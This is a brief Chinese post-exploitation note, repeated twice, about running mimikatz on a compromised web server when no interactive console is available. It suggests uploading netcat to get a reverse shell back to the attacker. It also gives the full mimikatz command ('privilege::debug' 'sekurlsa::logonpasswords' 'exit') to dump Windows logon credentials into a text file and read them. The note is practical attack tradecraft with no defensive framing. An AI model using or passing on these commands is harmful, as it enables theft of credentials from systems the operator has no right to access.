直接运行mimikatz.exe虽然可以激活进程,但看不到交互界面,姿势:
1、nc反弹,本地nc监听,然后上传nc到web服务器并执行反弹命令
2、直接执行mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt #之前试过不加exit,会无限重定向到password.txt,加exit后会自动退出
读取txt文件:type password.txt
直接运行mimikatz.exe虽然可以激活进程,但看不到交互界面,姿势:
1、nc反弹,本地nc监听,然后上传nc到web服务器并执行反弹命令
2、直接执行mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt #之前试过不加exit,会无限重定向到password.txt,加exit后会自动退出
读取txt文件:type password.txt